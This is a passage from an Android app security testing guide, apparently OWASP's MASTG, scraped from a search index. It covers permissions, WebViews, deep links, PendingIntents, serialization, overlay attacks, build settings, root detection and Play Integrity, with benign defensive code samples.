Suppose an app lists both READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE in its manifest. The app requests READ_EXTERNAL_STORAGE and the user grants it. If the app targets API level 25 or lower, the system also grants WRITE_EXTERNAL_STORAGE at the same time, because it belongs to the same STORAGE permission group and is also registered in the manifest. If the app targets Android 8.0 (API level 26), the system grants only READ_EXTERNAL_STORAGE at that time; however, if the app later requests WRITE_EXTERNAL_STORAGE, the system immediately grants that privilege without prompting the user.
You can see the list of permission groups in the Android developer documentation. To make this a bit more confusing, Google also warns that particular permissions might be moved from one group to another in future versions of the Android SDK and therefore, the logic of the app shouldn't rely on the structure of these permission groups. The best practice is to explicitly request every permission whenever it's needed.
Android 9 (API Level 28) Changes:
The following changes affect all apps running on Android 9, even to those apps targeting API levels lower than 28.
READ_CALL_LOG
, WRITE_CALL_LOG
, and PROCESS_OUTGOING_CALLS
(dangerous) permissions are moved from PHONE
to the new CALL_LOG
permission group. This means that being able to make phone calls (e.g. by having the permissions of the PHONE
group granted) is not sufficient to get access to the call logs.READ_CALL_LOG
permission when running on Android 9 (API level 28).WifiManager.getConnectionInfo
unless all of the following is true:ACCESS_FINE_LOCATION
or ACCESS_COARSE_LOCATION
permission.ACCESS_WIFI_STATE
permission.Apps targeting Android 9 (API level 28) or higher are affected by the following:
Build.getSerial
) unless the READ_PHONE_STATE
(dangerous) permission is granted.Android 10 (API level 29) Changes:
Android 10 (API level 29) introduces several user privacy enhancements. The changes regarding permissions affect to all apps running on Android 10 (API level 29), including those targeting lower API levels.
READ_FRAME_BUFFER
, CAPTURE_VIDEO_OUTPUT
, and CAPTURE_SECURE_VIDEO_OUTPUT
permissions are now signature-access only, which prevents silent access to the device's screen contents.Activity Permission Enforcement:
Permissions are applied via android:permission
attribute within the <activity>
tag in the manifest. These permissions restrict which applications can start that Activity. The permission is checked during Context.startActivity
and Activity.startActivityForResult
. Not holding the required permission results in a SecurityException
being thrown from the call.
Service Permission Enforcement:
Permissions applied via android:permission
attribute within the <service>
tag in the manifest restrict who can start or bind to the associated Service. The permission is checked during Context.startService
, Context.stopService
and Context.bindService
. Not holding the required permission results in a SecurityException
being thrown from the call.
Broadcast Permission Enforcement:
Permissions applied via android:permission
attribute within the <receiver>
tag restrict access to send broadcasts to the associated BroadcastReceiver
. The held permissions are checked after Context.sendBroadcast
returns, while trying to deliver the sent broadcast to the given receiver. Not holding the required permissions doesn't throw an exception, the result is an unsent broadcast.
A permission can be supplied to Context.registerReceiver
to control who can broadcast to a programmatically registered receiver. Going the other way, a permission can be supplied when calling Context.sendBroadcast
to restrict which broadcast receivers are allowed to receive the broadcast.
Note that both a receiver and a broadcaster can require a permission. When this happens, both permission checks must pass for the intent to be delivered to the associated target. For more information, please reference the section \"Restricting broadcasts with permissions\" in the Android Developers Documentation.
Content Provider Permission Enforcement:
Permissions applied via android:permission
attribute within the <provider>
tag restrict access to data in a ContentProvider. Content providers have an important additional security facility called URI permissions which is described next. Unlike the other components, ContentProviders have two separate permission attributes that can be set, android:readPermission
restricts who can read from the provider, and android:writePermission
restricts who can write to it. If a ContentProvider is protected with both read and write permissions, holding only the write permission does not also grant read permissions.
Permissions are checked when you first retrieve a provider and as operations are performed using the ContentProvider. Using ContentResolver.query
requires holding the read permission; using ContentResolver.insert
, ContentResolver.update
, ContentResolver.delete
requires the write permission. A SecurityException
will be thrown from the call if proper permissions are not held in all these cases.
Content Provider URI Permissions:
The standard permission system is not sufficient when being used with content providers. For example a content provider may want to limit permissions to READ permissions in order to protect itself, while using custom URIs to retrieve information. An application should only have the permission for that specific URI.
The solution is per-URI permissions. When starting or returning a result from an activity, the method can set Intent.FLAG_GRANT_READ_URI_PERMISSION
and/or Intent.FLAG_GRANT_WRITE_URI_PERMISSION
. This grants permission to the activity for the specific URI regardless if it has permissions to access to data from the content provider.
This allows a common capability-style model where user interaction drives ad-hoc granting of fine-grained permission. This can be a key facility for reducing the permissions needed by apps to only those directly related to their behavior. Without this model in place, malicious users may access other members' email attachments or harvest contact lists for future use via unprotected URIs. In the manifest the android:grantUriPermissions
attribute or the <grant-uri-permission> node helps restrict the URIs.
Here you can find more information about APIs related to URI Permissions:
Android allows apps to expose their services/components to other apps. Custom permissions are required for app access to the exposed components. You can define custom permissions in AndroidManifest.xml
by creating a permission tag with two mandatory attributes: android:name
and android:protectionLevel
.
It is crucial to create custom permissions that adhere to the Principle of Least Privilege: permission should be defined explicitly for its purpose, with a meaningful and accurate label and description.
Below is an example of a custom permission called START_MAIN_ACTIVITY
, which is required when launching the TEST_ACTIVITY
Activity.
The first code block defines the new permission, which is self-explanatory. The label tag is a summary of the permission, and the description is a more detailed version of the summary. You can set the protection level according to the types of permissions that will be granted. Once you've defined your permission, you can enforce it by adding it to the application's manifest. In our example, the second block represents the component that we are going to restrict with the permission we created. It can be enforced by adding the android:permission
attributes.
<permission android:name=\"com.example.myapp.permission.START_MAIN_ACTIVITY\"\n android:label=\"Start Activity in myapp\"\n android:description=\"Allow the app to launch the activity of myapp app, any app you grant this permission will be able to launch main activity by myapp app.\"\n android:protectionLevel=\"normal\" />\n\n<activity android:name=\"TEST_ACTIVITY\"\n android:permission=\"com.example.myapp.permission.START_MAIN_ACTIVITY\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n
Once the permission START_MAIN_ACTIVITY
has been created, apps can request it via the uses-permission
tag in the AndroidManifest.xml
file. Any application granted the custom permission START_MAIN_ACTIVITY
can then launch the TEST_ACTIVITY
. Please note <uses-permission android:name=\"myapp.permission.START_MAIN_ACTIVITY\" />
must be declared before the <application>
or an exception will occur at runtime. Please see the example below that is based on the permission overview and manifest-intro.
<manifest>\n<uses-permission android:name=\"com.example.myapp.permission.START_MAIN_ACTIVITY\" />\n <application>\n <activity>\n </activity>\n </application>\n</manifest>\n
We recommend using a reverse-domain annotation when registering a permission, as in the example above (e.g. com.domain.application.permission
) in order to avoid collisions with other applications.
WebViews are Android's embedded components which allow your app to open web pages within your application. In addition to mobile apps related threats, WebViews may expose your app to common web threats (e.g. XSS, Open Redirect, etc.).
One of the most important things to do when testing WebViews is to make sure that only trusted content can be loaded in it. Any newly loaded page could be potentially malicious, try to exploit any WebView bindings or try to phish the user. Unless you're developing a browser app, usually you'd like to restrict the pages being loaded to the domain of your app. A good practice is to prevent the user from even having the chance to input any URLs inside WebViews (which is the default on Android) nor navigate outside the trusted domains. Even when navigating on trusted domains there's still the risk that the user might encounter and click on other links to untrustworthy content (e.g. if the page allows for other users to post comments). In addition, some developers might even override some default behavior which can be potentially dangerous for the user.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#safebrowsing-api","title":"SafeBrowsing API","text":"To provide a safer web browsing experience, Android 8.1 (API level 27) introduces the SafeBrowsing API
, which allows your application to detect URLs that Google has classified as a known threat.
By default, WebViews show a warning to users about the security risk with the option to load the URL or stop the page from loading. With the SafeBrowsing API you can customize your application's behavior by either reporting the threat to SafeBrowsing or performing a particular action such as returning back to safety each time it encounters a known threat. Please check the Android Developers documentation for usage examples.
You can use the SafeBrowsing API independently from WebViews using the SafetyNet library, which implements a client for Safe Browsing Network Protocol v4. SafetyNet allows you to analyze all the URLs that your app is supposed to load. You can check URLs with different schemes (e.g. http, file) since SafeBrowsing is agnostic to URL schemes, and against TYPE_POTENTIALLY_HARMFUL_APPLICATION
and TYPE_SOCIAL_ENGINEERING
threat types.
When sending URLs or files to be checked for known threats make sure they don't contain sensitive data which could compromise a user's privacy, or expose sensitive content from your application.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#virus-total-api","title":"Virus Total API","text":"Virus Total provides an API for analyzing URLs and local files for known threats. The API Reference is available on Virus Total developers page.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#javascript-execution-in-webviews","title":"JavaScript Execution in WebViews","text":"JavaScript can be injected into web applications via reflected, stored, or DOM-based Cross-Site Scripting (XSS). Mobile apps are executed in a sandboxed environment and don't have this vulnerability when implemented natively. Nevertheless, WebViews may be part of a native app to allow web page viewing. Every app has its own WebView cache, which isn't shared with the native Browser or other apps. On Android, WebViews use the WebKit rendering engine to display web pages, but the pages are stripped down to minimal functions, for example, pages don't have address bars. If the WebView implementation is too lax and allows usage of JavaScript, JavaScript can be used to attack the app and gain access to its data.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#webview-protocol-handlers","title":"WebView Protocol Handlers","text":"Several default schemas are available for Android URLs. They can be triggered within a WebView with the following:
WebViews can load remote content from an endpoint, but they can also load local content from the app data directory or external storage. If the local content is loaded, the user shouldn't be able to influence the filename or the path used to load the file, and users shouldn't be able to edit the loaded file.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#java-objects-exposed-through-webviews","title":"Java Objects Exposed Through WebViews","text":"Android offers a way for JavaScript execution in a WebView to call and use native functions of an Android app (annotated with @JavascriptInterface
) by using the addJavascriptInterface
method. This is known as a WebView JavaScript bridge or native bridge.
Please note that when you use addJavascriptInterface
, you're explicitly granting access to the registered JavaScript Interface object to all pages loaded within that WebView. This implies that, if the user navigates outside your app or domain, all other external pages will also have access to those JavaScript Interface objects, which might present a potential security risk if any sensitive data is being exposed through those interfaces.
Warning: Take extreme care with apps targeting Android versions below Android 4.2 (API level 17) as they are vulnerable to a flaw in the implementation of addJavascriptInterface
: an attack that is abusing reflection, which leads to remote code execution when malicious JavaScript is injected into a WebView. This was due to all Java Object methods being accessible by default (instead of only those annotated).
Clearing the WebView resources is a crucial step when an app accesses any sensitive data within a WebView. This includes any files stored locally, the RAM cache and any loaded JavaScript.
As an additional measure, you could use server-side headers such as no-cache
, which prevent an application from caching particular content.
Starting on Android 10 (API level 29) apps are able to detect if a WebView has become unresponsive. If this happens, the OS will automatically call the onRenderProcessUnresponsive
method.
You can find more security best practices when using WebViews on Android Developers.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#deep-links","title":"Deep Links","text":"Deep links are URIs of any scheme that take users directly to specific content in an app. An app can set up deep links by adding intent filters on the Android Manifest and extracting data from incoming intents to navigate users to the correct activity.
Android supports two types of deep links:
myapp://
(not verified by the OS).http://
and https://
schemes and contain the autoVerify
attribute (which triggers OS verification).Deep Link Collision:
Using unverified deep links can cause a significant issue: any other apps installed on a user's device can declare and try to handle the same intent, which is known as deep link collision. Any arbitrary application can declare control over the exact same deep link belonging to another application.
In recent versions of Android this results in a so-called disambiguation dialog shown to the user that asks them to select the application that should handle the deep link. The user could make the mistake of choosing a malicious application instead of the legitimate one.
Android App Links:
In order to solve the deep link collision issue, Android 6.0 (API Level 23) introduced Android App Links, which are verified deep links based on a website URL explicitly registered by the developer. Clicking on an App Link will immediately open the app if it's installed.
There are some key differences from unverified deep links:
http://
and https://
schemes, any other custom URL schemes are not allowed.During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
The following is a list of Android IPC Mechanisms that may expose sensitive data:
Often while dealing with complex flows during app development, there are situations where an app A wants another app B to perform a certain action in the future, on app A's behalf. Trying to implement this by only using Intent
s leads to various security problems, like having multiple exported components. To handle this use case in a secure manner, Android provides the PendingIntent
API.
PendingIntent
are most commonly used for notifications, app widgets, media browser services, etc. When used for notifications, PendingIntent
is used to declare an intent to be executed when a user performs an action with an application's notification. The notification requires a callback to the application to trigger an action when the user clicks on it.
Internally, a PendingIntent
object wraps a normal Intent
object (referred to as the base intent) that will eventually be used to invoke an action. For example, the base intent specifies that an activity A should be started in an application. The receiving application of the PendingIntent
, will unwrap and retrieve this base intent and invoke the activity A by calling the PendingIntent.send
function.
A typical implementation for using PendingIntent
is below:
Intent intent = new Intent(applicationContext, SomeActivity.class); // base intent\n\n// create a pending intent\nPendingIntent pendingIntent = PendingIntent.getActivity(applicationContext, 0, intent, PendingIntent.FLAG_IMMUTABLE);\n\n// send the pending intent to another app\nIntent anotherIntent = new Intent();\nanotherIntent.setClassName(\"other.app\", \"other.app.MainActivity\");\nanotherIntent.putExtra(\"pendingIntent\", pendingIntent);\nstartActivity(anotherIntent);\n
What makes a PendingIntent
secure is that, unlike a normal Intent
, it grants permission to a foreign application to use the Intent
(the base intent) it contains, as if it were being executed by your application's own process. This allows an application to freely use them to create callbacks without the need to create exported activities.
If not implemented correctly, a malicious application can hijack a PendingIntent
. For example, in the notification example above, a malicious application with android.permission.BIND_NOTIFICATION_LISTENER_SERVICE
can bind to the notification listener service and retrieve the pending intent.
There are certain security pitfalls when implementing PendingIntent
s, which are listed below:
Mutable fields: A PendingIntent
can have mutable and empty fields that can be filled by a malicious application. This can lead to a malicious application gaining access to non-exported application components. Using the PendingIntent.FLAG_IMMUTABLE
flag makes the PendingIntent
immutable and prevents any changes to the fields. Prior to Android 12 (API level 31), the PendingIntent
was mutable by default, while since Android 12 (API level 31) it is changed to immutable by default to prevent accidental vulnerabilities.
Use of implicit intent: A malicious application can receive a PendingIntent
and then update the base intent to target the component and package within the malicious application. As a mitigation, ensure that you explicitly specify the exact package, action and component that will receive the base intent.
The most common case of PendingIntent
attack is when a malicious application is able to intercept it.
For further details, check the Android documentation on using a pending intent.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#implicit-intents","title":"Implicit Intents","text":"An Intent is a messaging object that you can use to request an action from another application component. Although intents facilitate communication between components in a variety of ways, there are three basic use cases: starting an activity, starting a service, and delivering a broadcast.
According to the Android Developers Documentation, Android provides two types of intents:
// Note the specification of a concrete component (DownloadActivity) that is started by the intent.\nIntent downloadIntent = new Intent(this, DownloadActivity.class);\ndownloadIntent.setAction(\"android.intent.action.GET_CONTENT\")\nstartActivityForResult(downloadIntent);\n
// Developers can also start an activity by just setting an action that is matched by the intended app.\nIntent downloadIntent = new Intent();\ndownloadIntent.setAction(\"android.intent.action.GET_CONTENT\")\nstartActivityForResult(downloadIntent);\n
The use of implicit intents can lead to multiple security risks, e.g. if the calling app processes the return value of the implicit intent without proper verification or if the intent contains sensitive data, it can be accidentally leaked to unauthorized third-parties.
You can refer to this blog post, this article and CWE-927 for more information about the mentioned problem, concrete attack scenarios and recommendations.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on Android:
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#object-serialization","title":"Object Serialization","text":"An object and its data can be represented as a sequence of bytes. This is done in Java via object serialization. Serialization is not inherently secure. It is just a binary format (or representation) for locally storing data in a .ser file. Encrypting and signing HMAC-serialized data is possible as long as the keys are stored safely. Deserializing an object requires a class of the same version as the class used to serialize the object. After classes have been changed, the ObjectInputStream
can't create objects from older .ser files. The example below shows how to create a Serializable
class by implementing the Serializable
interface.
import java.io.Serializable;\n\npublic class Person implements Serializable {\n private String firstName;\n private String lastName;\n\n public Person(String firstName, String lastName) {\n this.firstName = firstName;\n this.lastName = lastName;\n }\n //..\n //getters, setters, etc\n //..\n\n}\n
Now you can read/write the object with ObjectInputStream
/ObjectOutputStream
in another class.
There are several ways to serialize the contents of an object to JSON. Android comes with the JSONObject
and JSONArray
classes. A wide variety of libraries, including GSON, Jackson, Moshi, can also be used. The main differences between the libraries are whether they use reflection to compose the object, whether they support annotations, whether the create immutable objects, and the amount of memory they use. Note that almost all the JSON representations are String-based and therefore immutable. This means that any secret stored in JSON will be harder to remove from memory. JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on Android\" for more details. A simple example (from the GSON User Guide) of writing and reading JSON with GSON follows. In this example, the contents of an instance of the BagOfPrimitives
is serialized into JSON:
class BagOfPrimitives {\n private int value1 = 1;\n private String value2 = \"abc\";\n private transient int value3 = 3;\n BagOfPrimitives() {\n // no-args constructor\n }\n}\n\n// Serialization\nBagOfPrimitives obj = new BagOfPrimitives();\nGson gson = new Gson();\nString json = gson.toJson(obj);\n\n// ==> json is {\"value1\":1,\"value2\":\"abc\"}\n
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#xml","title":"XML","text":"There are several ways to serialize the contents of an object to XML and back. Android comes with the XmlPullParser
interface which allows for easily maintainable XML parsing. There are two implementations within Android: KXmlParser
and ExpatPullParser
. The Android Developer Guide provides a great write-up on how to use them. Next, there are various alternatives, such as a SAX
parser that comes with the Java runtime. For more information, see a blogpost from ibm.com. Similarly to JSON, XML has the issue of working mostly String based, which means that String-type secrets will be harder to remove from memory. XML data can be stored anywhere (database, files), but do need additional protection in case of secrets or information that should not be changed. See the chapter \"Data Storage on Android\" for more details. As stated earlier: the true danger in XML lies in the XML eXternal Entity (XXE) attack as it might allow for reading external data sources that are still accessible within the application.
There are libraries that provide functionality for directly storing the contents of an object in a database and then instantiating the object with the database contents. This is called Object-Relational Mapping (ORM). Libraries that use the SQLite database include
Realm, on the other hand, uses its own database to store the contents of a class. The amount of protection that ORM can provide depends primarily on whether the database is encrypted. See the chapter \"Data Storage on Android\" for more details. The Realm website includes a nice example of ORM Lite.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#parcelable","title":"Parcelable","text":"Parcelable
is an interface for classes whose instances can be written to and restored from a Parcel
. Parcels are often used to pack a class as part of a Bundle
for an Intent
. Here's an Android developer documentation example that implements Parcelable
:
public class MyParcelable implements Parcelable {\n private int mData;\n\n public int describeContents() {\n return 0;\n }\n\n public void writeToParcel(Parcel out, int flags) {\n out.writeInt(mData);\n }\n\n public static final Parcelable.Creator<MyParcelable> CREATOR\n = new Parcelable.Creator<MyParcelable>() {\n public MyParcelable createFromParcel(Parcel in) {\n return new MyParcelable(in);\n }\n\n public MyParcelable[] newArray(int size) {\n return new MyParcelable[size];\n }\n };\n\n private MyParcelable(Parcel in) {\n mData = in.readInt();\n }\n }\n
Because this mechanism that involves Parcels and Intents may change over time, and the Parcelable
may contain IBinder
pointers, storing data to disk via Parcelable
is not recommended.
Protocol Buffers by Google, are a platform- and language neutral mechanism for serializing structured data by means of the Binary Data Format. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality: there is no built in encryption.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overlay-attacks","title":"Overlay Attacks","text":"Screen overlay attacks occur when a malicious application manages to put itself on top of another application which remains working normally as if it were on the foreground. The malicious app might create UI elements mimicking the look and feel and the original app or even the Android system UI. The intention is typically to make users believe that they keep interacting with the legitimate app and then try to elevate privileges (e.g by getting some permissions granted), stealthy phishing, capture user taps and keystrokes etc.
There are several attacks affecting different Android versions including:
SYSTEM_ALERT_WINDOW
(\"draw on top\") and BIND_ACCESSIBILITY_SERVICE
(\"a11y\") permissions that, in case the app is installed from the Play Store, the users do not need to explicitly grant and for which they are not even notified.Usually, this kind of attacks are inherent to an Android system version having certain vulnerabilities or design issues. This makes them challenging and often virtually impossible to prevent unless the app is upgraded targeting a safe Android version (API level).
Over the years many known malware like MazorBot, BankBot or MysteryBot have been abusing the screen overlay feature of Android to target business critical applications, namely in the banking sector. This blog discusses more about this type of malware.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#enforced-updating","title":"Enforced Updating","text":"Starting from Android 5.0 (API level 21), together with the Play Core Library, apps can be forced to be updated. This mechanism is based on using the AppUpdateManager
. Before that, other mechanisms were used, such as doing http calls to the Google Play Store, which are not as reliable as the APIs of the Play Store might change. Alternatively, Firebase could be used to check for possible forced updates as well (see this blog). Enforced updating can be really helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Next, vulnerabilities are easily patched by means of forced updates.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/","title":"Android Code Quality and Build Settings","text":""},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#app-signing","title":"App Signing","text":"Android requires all APKs to be digitally signed with a certificate before they are installed or run. The digital signature is used to verify the owner's identity for application updates. This process can prevent an app from being tampered with or modified to include malicious code.
When an APK is signed, a public-key certificate is attached to it. This certificate uniquely associates the APK with the developer and the developer's private key. When an app is being built in debug mode, the Android SDK signs the app with a debug key created specifically for debugging purposes. An app signed with a debug key is not meant to be distributed and won't be accepted in most app stores, including the Google Play Store.
The final release build of an app must be signed with a valid release key. In Android Studio, the app can be signed manually or via creation of a signing configuration that's assigned to the release build type.
Prior Android 9 (API level 28) all app updates on Android need to be signed with the same certificate, so a validity period of 25 years or more is recommended. Apps published on Google Play must be signed with a key that that has a validity period ending after October 22th, 2033.
Three APK signing schemes are available:
The v2 signature, which is supported by Android 7.0 (API level 24) and above, offers improved security and performance compared to v1 scheme. The V3 signature, which is supported by Android 9 (API level 28) and above, gives apps the ability to change their signing keys as part of an APK update. This functionality assures compatibility and apps continuous availability by allowing both the new and the old keys to be used. Note that it is only available via apksigner at the time of writing.
For each signing scheme the release builds should always be signed via all its previous schemes as well.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"Android apps often make use of third party libraries. These third party libraries accelerate development as the developer has to write less code in order to solve a problem. There are two categories of libraries:
Mockito
used for testing and libraries like JavaAssist
used to compile certain other libraries.Okhttp3
.These libraries can lead to unwanted side-effects:
OKHTTP
prior to 2.7.5 in which TLS chain pollution was possible to bypass SSL pinning.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"Android applications run on a VM where most of the memory corruption issues have been taken care off. This does not mean that there are no memory corruption bugs. Take CVE-2018-9522 for instance, which is related to serialization issues using Parcels. Next, in native code, we still see the same issues as we explained in the general memory corruption section. Last, we see memory bugs in supporting services, such as with the Stagefright attack as shown at BlackHat.
Memory leaks are often an issue as well. This can happen for instance when a reference to the Context
object is passed around to non-Activity
classes, or when you pass references to Activity
classes to your helper classes.
Detecting the presence of binary protection mechanisms heavily depend on the language used for developing the application.
In general all binaries should be tested, which includes both the main app executable as well as all libraries/dependencies. However, on Android we will focus on native libraries since the main executables are considered safe as we will see next.
Android optimizes its Dalvik bytecode from the app DEX files (e.g. classes.dex) and generates a new file containing the native code, usually with an .odex, .oat extension. This Android compiled binary is wrapped using the ELF format which is the format used by Linux and Android to package assembly code.
The app's NDK native libraries also use the ELF format.
Learn more:
Debugging is an essential process for developers to identify and fix errors or bugs in their Android app. By using a debugger, developers can select the device to debug their app on and set breakpoints in their Java, Kotlin, and C/C++ code. This allows them to analyze variables and evaluate expressions at runtime, which helps them to identify the root cause of many issues. By debugging their app, developers can improve the functionality and user experience of their app, ensuring that it runs smoothly without any errors or crashes.
Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
attribute in the Application
element within the Android Manifest.
Generally, you should provide compiled code with as little explanation as possible. Some metadata, such as debugging information, line numbers, and descriptive function or method names, make the binary or bytecode easier for the reverse engineer to understand, but these aren't needed in a release build and can therefore be safely omitted without impacting the app's functionality.
To inspect native binaries, use a standard tool like nm
or objdump
to examine the symbol table. A release build should generally not contain any debugging symbols. If the goal is to obfuscate the library, removing unnecessary dynamic symbols is also recommended.
StrictMode is a developer tool for detecting violations, e.g. accidental disk or network access on the application's main thread. It can also be used to check for good coding practices, such as implementing performant code.
Here is an example of StrictMode
with policies enabled for disk and network access to the main thread:
public void onCreate() {\n if (DEVELOPER_MODE) {\n StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy.Builder()\n .detectDiskReads()\n .detectDiskWrites()\n .detectNetwork() // or .detectAll() for all detectable problems\n .penaltyLog()\n .build());\n StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder()\n .detectLeakedSqlLiteObjects()\n .detectLeakedClosableObjects()\n .penaltyLog()\n .penaltyDeath()\n .build());\n }\n super.onCreate();\n }\n
Inserting the policy in the if
statement with the DEVELOPER_MODE
condition is recommended. To disable StrictMode
, DEVELOPER_MODE
must be disabled for the release build.
Exceptions occur when an application gets into an abnormal or error state. Both Java and C++ may throw exceptions. Testing exception handling is about ensuring that the app will handle an exception and transition to a safe state without exposing sensitive information via the UI or the app's logging mechanisms.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/","title":"Android Anti-Reversing Defenses","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#general-disclaimer","title":"General Disclaimer","text":"The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
In the context of anti-reversing, the goal of root detection is to make running the app on a rooted device a bit more difficult, which in turn blocks some of the tools and techniques reverse engineers like to use. Like most other defenses, root detection is not very effective by itself, but implementing multiple root checks that are scattered throughout the app can improve the effectiveness of the overall anti-tampering scheme.
For Android, we define \"root detection\" a bit more broadly, including custom ROMs detection, i.e., determining whether the device is a stock Android build or a custom build.
In the following section, we list some common root detection methods you'll encounter. You'll find some of these methods implemented in the OWASP UnCrackable Apps for Android that accompany the OWASP Mobile Testing Guide.
Root detection can also be implemented through libraries such as RootBeer.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#google-play-integrity","title":"Google Play Integrity","text":"Google has launched the Google Play Integrity API to improve the security and integrity of apps and games on Android starting with Android 4.4 (API level 19). The previous official API, SafetyNet, did not cover all the security needs that Google wanted for the platform, so Play Integrity was developed with the basic functions of the previous API and integrated additional features. This change aims to protect users from dangerous and fraudulent interactions.
Google Play Integrity offers the following safeguards:
The API provides four macro categories of information to help the security team make a decision. These categories include:
Request Details: In this section, details are obtained about the app package that requested the integrity check, including its format (e.g., com.example.myapp), a base64-encoded ID provided by the developer to link the request with the integrity certificate, and the execution time of the request in milliseconds.
App Integrity: This section provides information about the integrity of the app, including the result of the verification (denominated verdict), which indicates whether the app's installation source is trusted (via Play Store) or unknown/suspicious. If the installation source is considered secure, the app version will also be displayed.
Account Details: This category provides information about the app licensing status. The result can be LICENSED
, indicating that the user purchased or installed the app on the Google Play Store; UNLICENSED
, meaning that the user does not own the app or did not acquire it through the Google Play Store; or UNEVALUATED
, which means that the licensing details could not be evaluated because a necessary requirement is missing, that is, the device may not be trustworthy enough or the installed app version is not recognized by the Google Play Store.
Device Integrity: This section presents information that verifies the authenticity of the Android environment in which the app is running.
MEETS_DEVICE_INTEGRITY
: The app is on an Android device with Google Play Services, passing system integrity checks and compatibility requirements.
MEETS_BASIC_INTEGRITY
: The app is on a device that may not be approved to run Google Play Services but passes basic integrity checks, possibly due to an unrecognized Android version, unlocked bootloader, or lack of manufacturer certification.MEETS_STRONG_INTEGRITY
: The app is on a device with Google Play Services, ensuring robust system integrity with features like hardware-protected boot.MEETS_VIRTUAL_INTEGRITY
: The app runs in an emulator with Google Play Services, passing system integrity checks and meeting Android compatibility requirements.API Errors:
The API can return local errors such as APP_NOT_INSTALLED
and APP_UID_MISMATCH
, which can indicate a fraud attempt or attack. In addition, outdated Google Play Services or Play Store can also cause errors, and it is important to check these situations to ensure proper integrity verification functionality and to ensure the environment is not intentionally set up for an attack. You can find more details on the official page.
Best practices:
Minimize queries to the Play Integrity API to reduce device resource impact. For example, employ the API only for essential device integrity verifications.
Include a NONCE
with integrity verification requests. This random value, generated by the app or server, helps the verification server confirm that responses match the original requests without third-party tampering.
Limitations: The default limit for Google Play Services Integrity Verification API requests is 10,000 requests per day. Applications needing more must contact Google to request an increased limit.
Example Request:
